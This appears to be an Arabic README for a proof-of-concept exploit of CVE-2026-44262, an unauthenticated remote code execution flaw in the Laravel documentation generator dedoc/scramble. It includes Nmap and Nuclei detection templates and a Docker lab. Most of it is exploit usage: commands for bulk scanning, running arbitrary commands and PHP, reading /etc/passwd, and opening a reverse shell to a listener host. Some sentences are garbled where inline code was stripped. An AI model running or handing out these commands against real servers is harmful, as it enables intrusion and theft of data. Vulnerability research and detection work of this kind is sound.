
RCE غير مصادق عليه في dedoc/scramble — PoC وقالب Nmap NSE وNuclei.
CVE-2026-44262 هي ثغرة تنفيذ تعليمات برمجية عن بُعد غير مصادق عليها في dedoc/scramble، وهو مولّد توثيق واجهات برمجة تطبيقات Laravel.
يستدعي NodeRulesEvaluator::doEvaluateExpression() الدالة extract($variables) قبل . عندما يعيّن المتحكم (controller) إلى متغير باسم ويستخدمه كقاعدة تحقق، يتتبع Scramble ذلك المتغير ويمرره إلى نطاق eval. يمكن للمهاجم استبدال بكود PHP عشوائي عبر إرسال معامل استعلام مصمم خصيصًا إلى .
eval("return $code;")$request->input()$code$code/docs/api.jsonالإصدارات المتأثرة: dedoc/scramble >=0.13.2, <0.13.22
sleep() لتأكيد تنفيذ evalproc_open في PHP، بدون الحاجة إلى bash أو busyboxhttp-scramble-rce-detect.nse)CVE-2026-44262.yaml)لا توجد تبعيات خارجية — يستخدم مكتبة Python القياسية فقط.
git clone https://github.com/joshuavanderpoll/CVE-2026-44262.git
cd CVE-2026-44262
python3 CVE-2026-44262.py --target http://example.com/docs/api
git clone https://github.com/joshuavanderpoll/CVE-2026-44262.git
cd CVE-2026-44262
python3 CVE-2026-44262.py --target http://example.com/docs/api
usage: CVE-2026-44262.py [-h] (--target TARGET | --targets FILE) [--docs-path PATH]
[--check] [--command CMD] [--code PHP] [--read-file PATH]
[--shell] [--lhost HOST] [--lport PORT] [--os OS]
[--useragent USERAGENT] [--timeout SECONDS]
# Full detection (timing + exec probe)
python3 CVE-2026-44262.py --target http://example.com/docs/api
# Safe check only — timing probe, no command execution
python3 CVE-2026-44262.py --target http://example.com/docs/api --check
# Override JSON endpoint path
python3 CVE-2026-44262.py --target http://example.com/docs/api --docs-path /api/openapi.json
# Bulk scan
python3 CVE-2026-44262.py --targets targets.txt
# Execute a command
python3 CVE-2026-44262.py --target http://example.com/docs/api --command "whoami"
# Read a file
python3 CVE-2026-44262.py --target http://example.com/docs/api --read-file /etc/passwd
# Execute raw PHP
python3 CVE-2026-44262.py --target http://example.com/docs/api --code "echo php_uname();"
# Reverse shell (start: nc -lv 4444)
python3 CVE-2026-44262.py --target http://example.com/docs/api --shell --lhost 172.17.0.1 --lport 4444
# Nmap
nmap -p 80,443 --script http-scramble-rce-detect example.com
# Nuclei
nuclei -t CVE-2026-44262.yaml -u http://example.com
تم تضمين بيئة Docker متكاملة مع التطبيق الضعيف (dedoc/scramble v0.13.21). انظر docker/DOCKER.md للتفاصيل.
cd docker/
docker compose up -d
python3 ../CVE-2026-44262.py --target http://localhost:8000/docs/api
هذه الأداة مقدمة للأغراض التعليمية والبحثية فقط. لا يتحمل المنشئ أي مسؤولية عن أي إساءة استخدام أو ضرر ناتج عن هذه الأداة.